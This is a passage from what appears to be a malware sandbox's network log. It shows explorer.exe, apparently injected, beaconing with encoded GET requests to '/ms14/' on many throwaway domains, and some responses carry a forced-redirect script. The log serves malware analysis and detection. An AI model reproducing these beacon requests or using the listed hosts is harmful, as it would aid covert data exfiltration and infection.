sans-serif; margin: 0; padding: 0; background-color: #f5f5f5; } .header { background-color: #007bff; color: #fff; padding: 20px; text-align: center; font-size: 32px; font-weight: bold; letter-spacing: 1px; } .hero-image { background-image: url('http://www.baidu.com/seo/skin/image/400.jpg'); height: 200px; background-position: center; background-repeat: no-repeat; background-size: cover; position: relative; } .hero-text { text-align: center; position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); color: #fff; font-size: 40px; font-weight: bold; text-shadow: 2px 2px rgba(0, 0, 0, 0.8); letter-spa
Aug 2, 2023 20:40:36.948326111 CEST	2824	IN	Data Raw: 63 69 6e 67 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 Data Ascii: cing: 4px; } .container { margin: 10px auto; padding: 20px; background-color: #fff; box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2); max-width: 800px; } h2 { font-size: 24px;
Aug 2, 2023 20:40:36.948848963 CEST	2825	IN	Data Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 63 61 6c 6c 2d 74 6f 2d 61 63 74 69 6f 6e 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 36 32 63 63 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 Data Ascii: } .call-to-action:hover { background-color: #0062cc; } a { text-decoration:none; } </style> </head> <body> <div class="header"> </div> <div class="h
Aug 2, 2023 20:40:36.948987007 CEST	2826	IN	Data Raw: e8 a6 81 e4 ba 86 e8 a7 a3 e5 92 8c e8 af a2 e9 97 ae e7 9b b8 e5 85 b3 e4 bf a1 e6 81 af ef bc 8c e6 af 94 e5 a6 82 e4 bb b7 e6 a0 bc e3 80 81 e4 bc 98 e6 83 a0 e3 80 81 e6 8a 80 e6 9c af e6 94 af e6 8c 81 e7 ad 89 e3 80 82 e5 a6 82 e6 9e 9c e4 Data Ascii:
Aug 2, 2023 20:40:36.949922085 CEST	2828	IN	Data Raw: 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 3e e4 bb 8e e6 9c ac e6 96 87 e4 b8 ad e6 88 91 e4 bb ac e5 8f af e4 bb a5 e7 9c 8b e5 87 ba ef bc 8c 20 e5 85 a8 e5 9b bd e5 ae a2 e6 9c 8d e7 94 b5 e8 af 9d e6 98 af e4 b8 80 e4 b8 aa e4 b8 Data Ascii: </h2> <p>
Aug 2, 2023 20:40:36.949979067 CEST	2829	IN	Data Raw: a0 e5 9c a8 e5 93 aa e5 84 bf ef bc 8c e5 8f aa e8 a6 81 e4 bd a0 e6 9c 89 e9 97 ae e9 a2 98 e9 9c 80 e8 a6 81 e8 a7 a3 e5 86 b3 ef bc 8c e9 83 bd e5 8f af e4 bb a5 e9 9a 8f e6 97 b6 e6 8b a8 e6 89 93 e7 94 b5 e8 af 9d ef bc 8c e5 be 97 e5 88 b0 Data Ascii: </p> <h3>2. </h3> <p>
Aug 2, 2023 20:40:36.950246096 CEST	2830	IN	Data Raw: e5 8a a1 ef bc 8c e4 b8 8d e5 a6 a8 e8 af 95 e8 af 95 20 e7 9a 84 e5 ae a2 e6 9c 8d e7 94 b5 e8 af 9d e5 90 a7 e3 80 82 e6 88 91 e4 bb ac e7 9b b8 e4 bf a1 ef bc 8c e5 9c a8 e8 bf 99 e9 87 8c e4 bd a0 e4 b8 80 e5 ae 9a e8 83 bd e5 a4 9f e5 be 97 Data Ascii: </p> <p><span style="color:red;"></span></p> </div> </div> </div> </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.11.20	49887	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:41:13.159672976 CEST	2838	OUT	GET /ms14/?1b-=3gz0oynYp3zT8Gk2EcItbwP2BcX4ajQnXUoMFrcFLcYyHJZZ+09POgtQTNUueZNkOof2&5jjx=X41P HTTP/1.1 Host: www.duffledash.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:41:13.415185928 CEST	2838	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 02 Aug 2023 18:41:13 GMT Content-Type: text/html Content-Length: 291 ETag: "64c88067-123" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.11.20	49888	8.212.100.103	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:41:42.025191069 CEST	2839	OUT	GET /ms14/?1b-=yfXJ3s0X+UYbexsvWZAPRPW6ab6VS3ID2ShjjTekTQ3Ib7o/HmiXiV9bVqQN/326JqDz&-Zxtd=AXLT HTTP/1.1 Host: www.aqeabrdm.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:41:42.222539902 CEST	2840	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 02 Aug 2023 18:41:42 GMT Content-Type: text/html; charset=utf-8 Content-Length: 128 Connection: close Location: /ms14?1b-=yfXJ3s0X+UYbexsvWZAPRPW6ab6VS3ID2ShjjTekTQ3Ib7o/HmiXiV9bVqQN/326JqDz&-Zxtd=AXLT Cache-Control: no-cache Cache-Control: no-cache Data Raw: 3c 61 20 68 72 65 66 3d 22 2f 6d 73 31 34 3f 31 62 2d 3d 79 66 58 4a 33 73 30 58 2b 55 59 62 65 78 73 76 57 5a 41 50 52 50 57 36 61 62 36 56 53 33 49 44 32 53 68 6a 6a 54 65 6b 54 51 33 49 62 37 6f 2f 48 6d 69 58 69 56 39 62 56 71 51 4e 2f 33 32 36 4a 71 44 7a 26 61 6d 70 3b 2d 5a 78 74 64 3d 41 58 4c 54 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="/ms14?1b-=yfXJ3s0X+UYbexsvWZAPRPW6ab6VS3ID2ShjjTekTQ3Ib7o/HmiXiV9bVqQN/326JqDz&-Zxtd=AXLT">Moved Permanently</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.11.20	49889	195.110.124.133	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:41:54.557792902 CEST	2840	OUT	GET /ms14/?1b-=v4jnj8oeAfTGDwcmYumWnwKscPxyy00cSlVLGwHp+ICaVPGa7n49O8PyWRHvgaeZi/w4&-Zxtd=AXLT HTTP/1.1 Host: www.cacciatoridiofferte.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:41:54.590253115 CEST	2841	IN	HTTP/1.1 404 Not Found Date: Wed, 02 Aug 2023 18:41:54 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 73 31 34 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ms14/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.11.20	49890	107.148.132.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:42:14.890453100 CEST	2842	OUT	GET /ms14/?1b-=gRDHLRWps2SwfQlNymIqzXaD2m02lj01kyW0DgHYrNguW9LYnKWDMhmIqN1YZq9kwDef&-Zxtd=AXLT HTTP/1.1 Host: www.qhrxnxoe.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:42:15.055001020 CEST	2843	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Aug 2023 18:42:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 31 39 30 0d 0a 20 20 3c 74 69 74 6c 65 3e e5 b0 8f e7 8c ab e5 93 a5 e7 99 be e5 ba a6 e6 8e a8 e5 b9 bf 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 31 33 37 37 38 30 30 30 35 31 32 39 61 38 63 63 35 39 35 35 66 63 66 36 31 62 38 64 35 64 34 32 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 27 68 74 74 70 3a 2f 2f 7a 74 2e 70 63 32 38 32 38 38 2e 63 6e 2f 27 3b 7d 2c 31 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190 <title></title><script><script>var _hmt = _hmt \|\| [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?137780005129a8cc5955fcf61b8d5d42"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><script>setTimeout(function(){top.location='http://zt.pc28288.cn/';},1);</script>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.11.20	49891	118.27.130.228	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:42:35.861361980 CEST	2844	OUT	GET /ms14/?1b-=FUnpMs8zmvOjmROP3PnlROYxRJ7cCFlgEWWc0/bexyWbb6gAbwR4+JgC7sIqrRtPqJOK&-Zxtd=AXLT HTTP/1.1 Host: www.peterscanner.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:42:36.050338030 CEST	2844	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 02 Aug 2023 18:42:35 GMT Server: Apache/2 Location: https://www.peterscanner.com/ms14/?1b-=FUnpMs8zmvOjmROP3PnlROYxRJ7cCFlgEWWc0/bexyWbb6gAbwR4+JgC7sIqrRtPqJOK&-Zxtd=AXLT Content-Length: 330 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 65 74 65 72 73 63 61 6e 6e 65 72 2e 63 6f 6d 2f 6d 73 31 34 2f 3f 31 62 2d 3d 46 55 6e 70 4d 73 38 7a 6d 76 4f 6a 6d 52 4f 50 33 50 6e 6c 52 4f 59 78 52 4a 37 63 43 46 6c 67 45 57 57 63 30 2f 62 65 78 79 57 62 62 36 67 41 62 77 52 34 2b 4a 67 43 37 73 49 71 72 52 74 50 71 4a 4f 4b 26 61 6d 70 3b 2d 5a 78 74 64 3d 41 58 4c 54 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.peterscanner.com/ms14/?1b-=FUnpMs8zmvOjmROP3PnlROYxRJ7cCFlgEWWc0/bexyWbb6gAbwR4+JgC7sIqrRtPqJOK&-Zxtd=AXLT">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.11.20	49892	38.53.14.151	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:42:56.623517990 CEST	2845	OUT	GET /ms14/?1b-=NKGPptx3tESdr+Lz8Wah6kurfWuL/UsV93iNqja3hqRom8j7cqld1UX1ucUTWIz98wJ+&-Zxtd=AXLT HTTP/1.1 Host: www.pgtjirqx.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:42:57.063214064 CEST	2845	OUT	GET /ms14/?1b-=NKGPptx3tESdr+Lz8Wah6kurfWuL/UsV93iNqja3hqRom8j7cqld1UX1ucUTWIz98wJ+&-Zxtd=AXLT HTTP/1.1 Host: www.pgtjirqx.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:42:57.547570944 CEST	2846	OUT	GET /ms14/?1b-=NKGPptx3tESdr+Lz8Wah6kurfWuL/UsV93iNqja3hqRom8j7cqld1UX1ucUTWIz98wJ+&-Zxtd=AXLT HTTP/1.1 Host: www.pgtjirqx.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.11.20	49896	199.59.243.224	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:43:17.289401054 CEST	2856	OUT	GET /ms14/?1b-=CKdxKfUSo22ZA3LOsCE+RVTQXZ6VDMwkgwUFVpD0jjvtMSwdrQmMlQAEfm5imY1vlK4D&-Zxtd=AXLT HTTP/1.1 Host: www.aniwatch.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:43:17.484226942 CEST	2858	IN	HTTP/1.1 200 OK date: Wed, 02 Aug 2023 18:43:17 GMT content-type: text/html; charset=utf-8 content-length: 1298 x-request-id: d7b45596-6744-47be-95a8-9484b1771122 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_e6y9VFuSG04tYnMgpdwawe2k+JKOWTrqUdqUcIXf+FUKbrPvRSqNAOLZaigQ6W58JsBKdIV9Kr33i5xoMwYWPQ== set-cookie: parking_session=d7b45596-6744-47be-95a8-9484b1771122; expires=Wed, 02 Aug 2023 18:58:17 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 65 36 79 39 56 46 75 53 47 30 34 74 59 6e 4d 67 70 64 77 61 77 65 32 6b 2b 4a 4b 4f 57 54 72 71 55 64 71 55 63 49 58 66 2b 46 55 4b 62 72 50 76 52 53 71 4e 41 4f 4c 5a 61 69 67 51 36 57 35 38 4a 73 42 4b 64 49 56 39 4b 72 33 33 69 35 78 6f 4d 77 59 57 50 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_e6y9VFuSG04tYnMgpdwawe2k+JKOWTrqUdqUcIXf+FUKbrPvRSqNAOLZaigQ6W58JsBKdIV9Kr33i5xoMwYWPQ==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
Aug 2, 2023 20:43:17.484299898 CEST	2859	IN	Data Raw: 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDdiNDU1OTYtNjc0NC00N2JlLTk1YTgtOTQ4NGIxNzcxMTIyIiwicGFnZV90aW1lIjoxNjk

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49869	104.17.157.1	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:36:27.206857920 CEST	2758	OUT	GET /ms14/?1b-=0MCVt3ro+Y2fULC7mglHTnfgc1Mr+oeAYZcaZJUD5Vdcg90q3P52QZV9uqsVct+gY69j&5jjx=X41P HTTP/1.1 Host: www.lasik-de-de-8808230.zone Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:36:27.226452112 CEST	2758	IN	HTTP/1.1 409 Conflict Date: Wed, 02 Aug 2023 18:36:27 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 7f086d2e1b282c3d-FRA Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31 Data Ascii: error code: 1001

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49871	107.148.132.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:36:48.343466043 CEST	2766	OUT	GET /ms14/?1b-=gRDHLRWps2SwfQlNymIqzXaD2m02lj01kyW0DgHYrNguW9LYnKWDMhmIqN1YZq9kwDef&5jjx=X41P HTTP/1.1 Host: www.qhrxnxoe.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:36:48.509077072 CEST	2767	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Aug 2023 18:36:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 31 39 30 0d 0a 20 20 3c 74 69 74 6c 65 3e e5 b0 8f e7 8c ab e5 93 a5 e7 99 be e5 ba a6 e6 8e a8 e5 b9 bf 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 31 33 37 37 38 30 30 30 35 31 32 39 61 38 63 63 35 39 35 35 66 63 66 36 31 62 38 64 35 64 34 32 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 27 68 74 74 70 3a 2f 2f 7a 74 2e 70 63 32 38 32 38 38 2e 63 6e 2f 27 3b 7d 2c 31 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190 <title></title><script><script>var _hmt = _hmt \|\| [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?137780005129a8cc5955fcf61b8d5d42"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><script>setTimeout(function(){top.location='http://zt.pc28288.cn/';},1);</script>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49873	52.76.96.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:37:10.365400076 CEST	2775	OUT	GET /ms14/?1b-=FAG/3ElgsYO4ErXa/mgt4C2qrKDxzHtkbmVaewmXtr6V8s4U3UCtQRfDU66dhU0yfzW0&5jjx=X41P HTTP/1.1 Host: www.sxbhpysr.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:37:10.517613888 CEST	2776	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 02 Aug 2023 18:37:10 GMT Content-Type: text/html; charset=utf-8 Content-Length: 127 Connection: close Location: /ms14?1b-=FAG/3ElgsYO4ErXa/mgt4C2qrKDxzHtkbmVaewmXtr6V8s4U3UCtQRfDU66dhU0yfzW0&5jjx=X41P Cache-Control: no-cache Data Raw: 3c 61 20 68 72 65 66 3d 22 2f 6d 73 31 34 3f 31 62 2d 3d 46 41 47 2f 33 45 6c 67 73 59 4f 34 45 72 58 61 2f 6d 67 74 34 43 32 71 72 4b 44 78 7a 48 74 6b 62 6d 56 61 65 77 6d 58 74 72 36 56 38 73 34 55 33 55 43 74 51 52 66 44 55 36 36 64 68 55 30 79 66 7a 57 30 26 61 6d 70 3b 35 6a 6a 78 3d 58 34 31 50 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="/ms14?1b-=FAG/3ElgsYO4ErXa/mgt4C2qrKDxzHtkbmVaewmXtr6V8s4U3UCtQRfDU66dhU0yfzW0&5jjx=X41P">Moved Permanently</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49874	198.252.102.187	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:37:29.463073969 CEST	2777	OUT	GET /ms14/?1b-=x+ehIhQzCHSzi6+DzanXnJOFQcXmX6xS+w2gYe8McJfF9Pp0nYwm3E09SfZIXmikxG0j&5jjx=X41P HTTP/1.1 Host: www.venria.store Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:37:29.595817089 CEST	2778	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 02 Aug 2023 18:37:29 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 